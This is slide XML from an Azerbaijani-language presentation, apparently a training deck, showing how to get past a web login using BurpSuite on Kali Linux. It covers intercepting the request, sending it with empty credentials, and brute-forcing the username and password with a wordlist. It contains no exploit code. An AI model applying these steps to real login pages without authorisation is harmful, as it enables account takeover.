                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ıldığını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> amma</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uğursuz nəticə göstərdiyini görürük</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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29" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9521665" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048771" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9521665" y="295275"/>
            <a:ext cx="2460785" cy="4282440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Başda yazılan 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>üsuluda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>KaliLinuxda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> qurulu olaraq gələn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vasitəsiynən</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> həyata keçirəcəyik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30" name="Şəkil 4" descr="Şəkil ehtiva edir mətn, monitor, ani görüntü, ekran  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1769" r="2064"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3171217" cy="6871806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097231" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="2503"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3171216" y="-1"/>
            <a:ext cx="6242305" cy="1407845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097232" name="Şəkil 8" descr="Şəkil ehtiva edir mətn, ani görüntü, monitor, ekran  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="2135"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3171217" y="1133449"/>
            <a:ext cx="6242306" cy="5738357"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048772" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413521" y="2312518"/>
            <a:ext cx="2862785" cy="2174241"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İlk olaraq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brauzeri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ilə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>əlaqələndiririk</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="3200" dirty="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33" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="5136752" cy="3817856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097234" name="Şəkil 10" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="657" r="26634" b="6909"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138521" y="0"/>
            <a:ext cx="7053479" cy="6249971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048773" name="Mətn Qutusu 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="4012409"/>
            <a:ext cx="5038928" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Açığın olduğu shifəni yeniləyirik və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> programına bağlantı gedir</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Proxy-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;Intercept </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bölməsindəki bağlantıya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mausun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sağ düyməsi ilə basırıq və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsinə göndəririk</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sağdaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> şəkildəki kimi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT AUTHENTİCATED</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazısı var yəni uğursuz nəticə göstərir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048774" name="Düzbucaqlı 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2344366" y="2286000"/>
            <a:ext cx="1001949" cy="19455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75" name="Düzbucaqlı 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8852171" y="5233481"/>
            <a:ext cx="1001949" cy="19455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76" name="Düzbucaqlı 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="133350" y="1352550"/>
            <a:ext cx="3562350" cy="1143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35" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="918"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8795208" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048777" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8795207" y="0"/>
            <a:ext cx="2872917" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>word – Bo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ş qoyma</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048778" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8795207" y="795337"/>
            <a:ext cx="3057525" cy="2758441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İlk üsulda istifadəçi adı və parolu silirik və bağlantını yenidən göndəririk </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nəticə deyişmir</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800000"/>
                </a:highlight>
              </a:rPr>
              <a:t>NOT AUTHENTİCATED</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazısı çıxır</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu üsul işə yaramadığı üçün ikinci üsulumuza keçirik.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048779" name="Düzbucaqlı 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4591455" y="6225703"/>
            <a:ext cx="1274323" cy="19455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36" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7317884" cy="4912468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097237" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="3429000"/>
            <a:ext cx="9909495" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048780" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7317884" y="56561"/>
            <a:ext cx="4776706" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assword – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Güc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tədbiqi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048781" name="Mətn Qutusu 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7317884" y="712417"/>
            <a:ext cx="4664566" cy="891540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu üsulda istifadəçi adı və parolu</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Güc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tədbiqi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ilə tapmağa çalışırıq istədiyimiz hər hansı bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wordlistd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ən </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>istifadə edə bilərik</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048782" name="Mətn Qutusu 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7249791" y="1994569"/>
            <a:ext cx="4942210" cy="891540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
